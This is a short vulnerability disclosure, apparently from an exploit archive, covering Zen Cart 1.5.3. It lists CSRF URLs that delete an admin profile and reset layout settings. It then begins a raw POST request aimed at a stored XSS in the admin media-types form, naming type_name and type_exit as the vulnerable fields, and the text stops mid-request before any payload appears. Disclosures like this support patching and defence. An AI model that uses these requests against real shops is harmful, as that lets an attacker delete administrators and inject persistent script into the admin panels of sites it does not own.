#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl 
#1 - CSRF 
- Delete admin 
GET profile stands for user id. 
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2 
- Reset layout boxes to default 
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults 
#2 - Persistent XSS in admin panel 
Since admin privileges are required to execute following vulnerablities this is not a serious threat. 
- Extras -> Media types -> Add 
Vulnerable parameters - type_name & type_exit 
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663 
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken" 
b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"
sup